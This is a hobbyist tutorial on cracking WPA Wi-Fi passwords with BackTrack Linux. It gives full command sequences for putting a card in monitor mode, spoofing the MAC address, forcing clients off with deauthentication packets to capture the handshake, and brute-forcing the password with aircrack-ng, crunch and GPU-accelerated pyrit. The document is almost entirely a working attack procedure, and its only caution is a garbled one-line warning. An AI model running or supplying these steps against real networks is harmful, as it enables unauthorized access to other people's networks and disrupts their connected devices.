Crack Wifi With Backtrack@3gzone

WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.

certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!

Download VMware Workstation here: http://www.softpedia.com/get/System/OSEnhancements/VMware-Workstation.shtml Create a new virtual machine like i have created...!!!

press enter......go on

At BOOT Menu....just type startx

an Now your all set to go...just simply follow below steps...now

Rules to Follow

o o o o

A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. here a link to download it http://www.backtrack-linux.org/downloads I highly recommend you to download backtrck 32 bit version coz it runs smoothly...in win7 64bit through vmware workstation.......... / A nearby WEP-enabled Wi-Fi network Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Steps to Follow:
Step 1 :
airmon-ng

The result will be something like :

Interface wlan0 Chipset Intel 5100 Driver iwlagn - [phy0]

Step 2 :
airmon-ng start wlan0

Step 3 (Optional) : Change the mac address of the mon0 interface.

ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up

Step 4 :
airodump-ng mon0

Then, press "Ctrl+c" to break the program. Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel -w is the file to be written --bssid is the BSSID

This terminal is keeping running. Step 6 : open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake. Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,, If you do not want to use John the Ripper as word list, you can use Crunch. Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch3.0.tgz/download tar -xvzf crunch-3.0.tgz cd crunch-3.0 make make install /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters. (B) nVidia Display Card with CUDA If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch. Step a :
airmon-ng

The result will be something like :

Interface wlan0 Chipset Intel 5100 Driver iwlagn - [phy0]

Step b :
airmon-ng start wlan0

Step c (Optional) : Change the mac address of the mon0 interface.

ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up

Step d :
airodump-ng mon0

Then, press "Ctrl+c" to break the program. Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f : open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake. Step g : If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev pythonscapy

Step h : Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch3.0.tgz/download tar -xvzf crunch-3.0.tgz cd crunch-3.0 make make install

Step i : Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz cd pyrit-0.4.0 python setup.py build sudo python setup.py install tar -xzvf cpyrit-cuda-0.4.0.tar.gz cd cpyrit-cuda-0.4.0 python setup.py build sudo python setup.py install

Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit -all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters. Step k (Optional) : If you encounter error when reading the wpacrack-01.cap, you should do the following step.
pyrit -r wpacrack-01.cap -o new.cap stripLive /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit -all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters. Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file 'new.cap' (1/1)... Parsed 71 packets (71 802.11-packets), got 55 AP(s) Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks : If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second. To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.